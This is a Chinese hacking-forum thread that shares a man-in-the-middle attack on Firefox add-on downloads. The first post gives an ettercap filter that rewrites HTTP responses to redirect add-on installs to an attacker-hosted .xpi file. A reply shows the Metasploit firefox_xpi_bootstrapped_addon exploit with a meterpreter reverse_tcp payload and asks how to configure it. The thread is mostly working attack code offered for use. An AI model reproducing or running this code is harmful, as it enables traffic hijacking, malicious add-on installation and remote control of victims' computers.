切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
47 : 中间人攻击 ettercap : 劫持FIREFOX 插件[复制链接]
发表于 2012-8-18 23:52:24 | 显示全部楼层 |!read_mode!
  1. # firefox xpi by Dis9Team
  2. if (ip.proto == TCP && search(DATA.data, "application/x-xpinstall") ){
  3. msg("found ff\n");
  4. if (search(DATA.data, "dos")) {
  5.      msg("doing nothing\n");
  6. } else {
  7. replace("200 OK", "301 Moved Permanently
  8. Location: http://192.168.40.128/1.xpi");
  9. msg("redirect success\n");

  10. }
  11. }
复制代码
http://good.gd/2086172.htm

操千曲而后晓声,观千剑而后识器。
发表于 2012-8-19 02:03:43 | 显示全部楼层
http://www.cao.com/dis9/47/47.html

/************************************
***********************************/
  1. msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
  2. msf  exploit(firefox_xpi_bootstrapped_addon) > show options

  3. Module options (payload/windows/meterpreter/reverse_tcp):
复制代码




use exploit后怎么把下面的这个payload加进去?



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-21 06:49

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部